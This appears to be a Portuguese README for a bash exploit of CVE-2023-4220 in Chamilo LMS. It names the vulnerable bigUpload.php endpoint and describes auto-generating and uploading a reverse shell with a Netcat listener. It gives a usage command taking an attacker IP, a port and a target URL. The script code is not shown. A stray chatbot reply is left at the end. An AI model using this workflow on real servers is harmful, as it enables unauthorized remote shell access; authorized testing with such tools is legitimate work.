
Refurbish Chamilo LMS CVE-2023-4220 exploit escrito em bash
Este script explora uma vulnerabilidade de Execução Remota de Código (RCE) no Chamilo LMS versões ≤ v1.11.24. A vulnerabilidade (CVE-2023-4220) existe devido a uma funcionalidade de upload de arquivo irrestrito no recurso bigUpload.php do Chamilo LMS, que permite que atacantes façam upload de arquivos arbitrários (como web shells) e os executem, levando à execução remota total de código no servidor.
Este script foi aprimorado por Divine Clown para otimizar o processo de exploração, gerando automaticamente um arquivo de reverse shell, fazendo upload para o alvo e iniciando um listener para dar ao atacante acesso direto ao shell.
/main/inc/lib/javascript/bigupload/inc/bigUpload.phpbigUpload.php../CVE-2023-4220.sh -i <attacker_ip> -p <port> -h <host_link>
-i <attacker_ip>: O endereço IP do atacante para o reverse shell.-p <port>: A porta onde o listener Netcat será iniciado.-h <host_link>: A URL completa da instância vulnerável do Chamilo LMS../CVE-2023-4220.sh -i 10.10.14.15 -p 9001 -h http://target-site.com
Esta ferramenta destina-se exclusivamente a fins educacionais e ambientes de teste onde você tenha permissão explícita para explorar vulnerabilidades. O acesso não autorizado a sistemas é ilegal e pode resultar em acusações criminais. Os autores não serão responsabilizados por qualquer uso indevido ou dano causado por este script.
Sinta-se à vontade para modificar o README ainda mais se quiser incluir qualquer informação ou formatação adicional! Avise-me se precisar de mais alguma coisa.